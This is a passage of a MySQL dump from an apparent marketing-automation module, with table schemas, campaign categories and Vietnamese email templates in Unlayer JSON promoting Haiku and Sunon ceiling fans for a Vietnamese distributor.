class=\\\\\\\"panel-title\\\\\\\" data-toggle=\\\\\\\"collapse\\\\\\\" data-target=\\\\\\\"#collapse_node_2\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n        <span class=\\\\\\\"text-primary glyphicon glyphicon-envelope\\\\\\\"> <\\/span><span class=\\\\\\\"text-primary\\\\\\\"> email<\\/span>\\\\r\\\\n      <\\/h4>\\\\r\\\\n    <\\/div>\\\\r\\\\n    <div id=\\\\\\\"collapse_node_2\\\\\\\" class=\\\\\\\"panel-collapse collapse in\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n\\\\r\\\\n      <div class=\\\\\\\"box\\\\\\\" node-id=\\\\\\\"2\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\">\\\\r\\\\n          <label for=\\\\\\\"complete_action\\\\\\\">Complete action:<\\/label><br \\/>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[2]\\\\\\\" id=\\\\\\\"complete_action_right_away[2]\\\\\\\" value=\\\\\\\"right_away\\\\\\\" checked df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_right_away[2]\\\\\\\">Right away<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[2]\\\\\\\" id=\\\\\\\"complete_action_after[2]\\\\\\\" value=\\\\\\\"after\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_after[2]\\\\\\\">After<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[2]\\\\\\\" id=\\\\\\\"complete_action_exact_time[2]\\\\\\\" value=\\\\\\\"exact_time\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_exact_time[2]\\\\\\\">Exact time<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[2]\\\\\\\" id=\\\\\\\"complete_action_exact_time_and_date[2]\\\\\\\" value=\\\\\\\"exact_time_and_date\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_exact_time_and_date[2]\\\\\\\">Exact time and date<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_after hide\\\\\\\">\\\\r\\\\n                        <div class=\\\\\\\"row\\\\\\\">\\\\r\\\\n              <div class=\\\\\\\"col-md-6 no-padding-right\\\\\\\">\\\\r\\\\n                <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"waiting_number[2]\\\\\\\"><input type=\\\\\\\"number\\\\\\\" id=\\\\\\\"waiting_number[2]\\\\\\\" name=\\\\\\\"waiting_number[2]\\\\\\\" class=\\\\\\\"form-control\\\\\\\" df-waiting_number=\\\\\\\"\\\\\\\" value=\\\\\\\"1\\\\\\\"><\\/div>              <\\/div>\\\\r\\\\n              <div class=\\\\\\\"col-md-6\\\\\\\">\\\\r\\\\n                <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"waiting_type[2]\\\\\\\"><select id=\\\\\\\"waiting_type[2]\\\\\\\" name=\\\\\\\"waiting_type[2]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-waiting_type=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"minutes\\\\\\\">Min<\\/option><option value=\\\\\\\"hour\\\\\\\">Hours<\\/option><option value=\\\\\\\"day\\\\\\\">Days<\\/option><\\/select><\\/div>              <\\/div>\\\\r\\\\n            <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_exact_time hide\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"exact_time[2]\\\\\\\"><label for=\\\\\\\"exact_time[2]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Exact time<\\/label><input type=\\\\\\\"time\\\\\\\" id=\\\\\\\"exact_time[2]\\\\\\\" name=\\\\\\\"exact_time[2]\\\\\\\" class=\\\\\\\"form-control\\\\\\\" df-exact_time=\\\\\\\"\\\\\\\" value=\\\\\\\"\\\\\\\"><\\/div>        <\\/div>\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_exact_time_and_date hide\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"exact_time_and_date[2]\\\\\\\"><label for=\\\\\\\"exact_time_and_date[2]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Exact time and date<\\/label><div class=\\\\\\\"input-group date\\\\\\\"><input type=\\\\\\\"text\\\\\\\" id=\\\\\\\"exact_time_and_date[2]\\\\\\\" name=\\\\\\\"exact_time_and_date[2]\\\\\\\" class=\\\\\\\"form-control datetimepicker\\\\\\\" df-exact_time_and_date=\\\\\\\"\\\\\\\" value=\\\\\\\"\\\\\\\" autocomplete=\\\\\\\"off\\\\\\\"><div class=\\\\\\\"input-group-addon\\\\\\\">\\\\r\\\\n    <i class=\\\\\\\"fa-regular fa-calendar calendar-icon\\\\\\\"><\\/i>\\\\r\\\\n<\\/div><\\/div><\\/div>          \\\\r\\\\n        <\\/div>\\\\r\\\\n        <hr>\\\\r\\\\n        <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"email[2]\\\\\\\"><label for=\\\\\\\"email[2]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Emails<\\/label><select id=\\\\\\\"email[2]\\\\\\\" name=\\\\\\\"email[2]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-email=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"1\\\\\\\">Haiku - qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi<\\/option><option value=\\\\\\\"6\\\\\\\">Haiku - qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh \\u0111\\u1ea7u ti\\u00ean tr\\u00ean th\\u1ebf gi\\u1edbi (VN)<\\/option><option value=\\\\\\\"4\\\\\\\">Tổ chức đào tạo WIT<\\/option><option value=\\\\\\\"12\\\\\\\">Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i ho\\u00e0n h\\u1ea3o<\\/option><option value=\\\\\\\"13\\\\\\\">Tổ chức đào tạo WIT - THANK YOU TO CUSTOMER VISIT VMIF 2023 EXHIBITION IN BINH DUONG<\\/option><option value=\\\\\\\"3\\\\\\\">NCC THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/option><option value=\\\\\\\"8\\\\\\\">New - Qu\\u1ea1t tr\\u1ea7n Haiku - gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf c\\u1ee7a b\\u1ea1n<\\/option><option value=\\\\\\\"9\\\\\\\">Qu\\u1ea1t tr\\u1ea7n Tổ chức đào tạo WIT - gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf c\\u1ee7a b\\u1ea1n<\\/option><option value=\\\\\\\"5\\\\\\\">Qu\\u1ea1t Tr\\u1ea7n SUNON - Gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t to\\u00e0n di\\u1ec7n kh\\u00f4ng gian r\\u1ed9ng\\/l\\u1edbn<\\/option><option value=\\\\\\\"10\\\\\\\">Sunon - Powerful HVLS Fan series 1<\\/option><option value=\\\\\\\"11\\\\\\\">Sunon - Powerful HVLS Fan series 3<\\/option><option value=\\\\\\\"7\\\\\\\">[Tổ chức đào tạo WIT] - Cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p to\\u00e0n di\\u1ec7n qu\\u1ea1t l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf\\/V\\u0103n Ph\\u00f2ng & Nh\\u00e0 X\\u01b0\\u1edfng<\\/option><\\/select><\\/div>\\\\r\\\\n      <\\/div>\\\\r\\\\n    <\\/div>\\\\r\\\\n  <\\/div>\\\\r\\\\n<\\/div>\\\",\\\"typenode\\\":false,\\\"inputs\\\":{\\\"input_1\\\":{\\\"connections\\\":[{\\\"node\\\":\\\"1\\\",\\\"input\\\":\\\"output_1\\\"}]}},\\\"outputs\\\":{\\\"output_1\\\":{\\\"connections\\\":[]}},\\\"pos_x\\\":721.8333129882812,\\\"pos_y\\\":290}}}}}\"', '', 1, '2024-01-29 21:56:45');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_campaign_flows`
--

CREATE TABLE `tblma_campaign_flows` (
  `id` int(11) NOT NULL,
  `campaign_id` int(11) NOT NULL,
  `node_id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `dateadded` datetime NOT NULL,
  `output` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_campaign_lead_exceptions`
--

CREATE TABLE `tblma_campaign_lead_exceptions` (
  `id` int(11) NOT NULL,
  `lead_id` int(11) NOT NULL,
  `campaign_id` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_categories`
--

CREATE TABLE `tblma_categories` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `type` text DEFAULT NULL,
  `published` int(11) NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `color` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_categories`
--

INSERT INTO `tblma_categories` (`id`, `name`, `type`, `published`, `description`, `addedfrom`, `dateadded`, `color`) VALUES
(1, 'Email_List', 'email', 1, '', 1, '2022-11-14 20:55:30', '#ee4c14'),
(2, 'Segment_Hamilton', 'segment', 1, '', 1, '2022-11-14 20:55:45', '#fbc906'),
(3, 'Point_Action', 'point_action', 1, '', 1, '2022-11-14 20:56:06', '#0d7bf0'),
(4, 'Email_Template_Hamilton', 'email_template', 1, '', 1, '2022-11-17 13:48:26', '#fbc906'),
(5, 'Campain_Hamilton', 'campaign', 1, '', 1, '2022-11-17 13:49:35', '#fbc906'),
(6, 'Form_HamiltonAir', 'form', 1, '', 1, '2022-11-17 18:39:28', '#46b51f'),
(7, 'Asset_Hamilton', 'asset', 1, '', 1, '2022-11-17 18:42:15', '#000000'),
(9, 'Email', 'email', 1, '', 1, '2022-11-17 18:42:41', '#000000'),
(10, 'SMS_Template', 'text_message', 1, '', 1, '2022-11-17 18:42:54', '#000000'),
(11, 'Stage_Hamilton', 'stage', 1, '', 1, '2023-02-28 06:10:27', '#000000'),
(12, 'Hamilton_Air_Cate', 'segment', 1, '', 1, '2024-01-29 21:16:22', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_emails`
--

CREATE TABLE `tblma_emails` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `type` text NOT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `segment` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `language` varchar(40) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `color` text DEFAULT NULL,
  `subject` text DEFAULT NULL,
  `email_template` int(11) DEFAULT NULL,
  `from_name` text DEFAULT NULL,
  `from_address` text DEFAULT NULL,
  `reply_to_address` text DEFAULT NULL,
  `bcc_address` text DEFAULT NULL,
  `attachment` text DEFAULT NULL,
  `data_design` longtext DEFAULT NULL,
  `data_html` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_emails`
--

INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(1, 'Haiku - quạt trần thông minh nhất thế giới', '', 1, 0, 1, 'vietnamese', '', 1, '2022-11-17 13:51:44', '#0c60b3', 'Haiku - quạt trần thông minh đầu tiên trên thế giới', 11, 'WIT - nhà cung cấp quạt trần chất lượng hàng đầu', 'no-reply@hogiaphat.vn', 'sale@hogiaphat.vn', 'cskh@hogiaphat.vn', '', '\"{\\\"counters\\\":{\\\"u_row\\\":8,\\\"u_column\\\":9,\\\"u_content_text\\\":11,\\\"u_content_image\\\":4,\\\"u_content_button\\\":5,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4,\\\"u_content_html\\\":1},\\\"body\\\":{\\\"id\\\":\\\"0u7zmWfe6N\\\",\\\"rows\\\":[{\\\"id\\\":\\\"mzyaBaFj3Q\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"U5J6RuT_G3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"PU1AcFTaVA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 5px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\",\\\"width\\\":980,\\\"height\\\":130},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IujIkibZVI\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#a47e6b\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"56KZmfuYsA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922756155-smart-fans-haiku.jpg\\\",\\\"width\\\":2482,\\\"height\\\":3510},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"SBnl2jWXAQ\\\",\\\"type\\\":\\\"html\\\",\\\"values\\\":{\\\"html\\\":\\\"<div class=\\\\\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\\\\\">\\\\n<h3><span style=\\\\\\\"font-size: 16px;\\\\\\\">K\\u00edch th\\u01b0\\u1edbc \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh qu\\u1ea1t Haiku<\\/span><\\/h3>\\\\n<p>52 inch, 60 inch v\\u00e0 84 inch. N\\u1ebfu b\\u1ea1n c\\u1ea7n c\\u00e1nh l\\u1edbn h\\u01a1n? H\\u00e3y xem <strong><a href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-lon\\\\\\\">Qu\\u1ea1t Tr\\u1ea7n C\\u00e1nh L\\u1edbn<\\/a>.<\\/strong><\\/p>\\\\n  <img src=\\\\\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Fan-Haiku-Sizes.svg\\\\\\\" alt=\\\\\\\"Haiku Fans Size\\\\\\\"><\\/div><div class=\\\\\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\\\\\">\\\\n<h2><span style=\\\\\\\"font-size: 16px;\\\\\\\">K\\u00edch th\\u01b0\\u1edbc c\\u00e1nh qu\\u1ea1t Haiku ph\\u00f9 h\\u1ee3p d\\u00e0nh cho Nh\\u00e0 \\u1ede, Bi\\u1ec7t Th\\u1ef1, Penthouse.<\\/span><\\/h2>\\\\n<p>Thi\\u1ebft k\\u1ebf qu\\u1ea1t tr\\u1ea7n Haiku c\\u00f3 s\\u1ea3i c\\u00e1nh ph\\u1ed5 th\\u00f4ng 3 c\\u00e1nh ch\\u1ea5t li\\u1ec7u Bamboo\\/Aluminium\\/Composite<\\/p>\\\\n<img src=\\\\\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Haiku-Dimensions.svg\\\\\\\" alt=\\\\\\\"Haiku Fans Size\\\\\\\"><\\/div>\\\\n\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_html_1\\\",\\\"htmlClassNames\\\":\\\"u_content_html\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\\\\\">\\\\\\\" \\u0110\\u1eb3ng c\\u1ea5p th\\u01b0\\u1ee3ng l\\u01b0u<\\/span><\\/strong><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\\\\\">Ti\\u1ec7n \\u00edch x\\u1ee9ng t\\u1ea7m \\\\\\\"<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>CH\\u1ea4T LI\\u1ec6U CAO C\\u1ea4P<\\/strong><br \\/>Haiku\\u00ae \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng v\\u1edbi<br \\/>v\\u1eadt li\\u1ec7u ch\\u1ea5t l\\u01b0\\u1ee3ng cao, nh\\u01b0 Moso Bamboo\\u00a0<br \\/>ho\\u1eb7c Alumium (aircraft-grade). Qu\\u1ea1t Haiku\\u00a0<br \\/>\\u0111\\u01b0\\u1ee3c c\\u00e2n b\\u1eb1ng tay trong quy tr\\u00ecnh 13 b\\u01b0\\u1edbc,\\u00a0<br \\/>\\u0111\\u1ea3m b\\u1ea3o s\\u1ebd kh\\u00f4ng c\\u00f3 qu\\u1ea1t n\\u00e0o rung l\\u1eafc.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"-H-RpfJAgN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677923146192-Brochure_Haiku_New.jpg\\\",\\\"width\\\":2550,\\\"height\\\":3300},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ecf0f1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":224,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 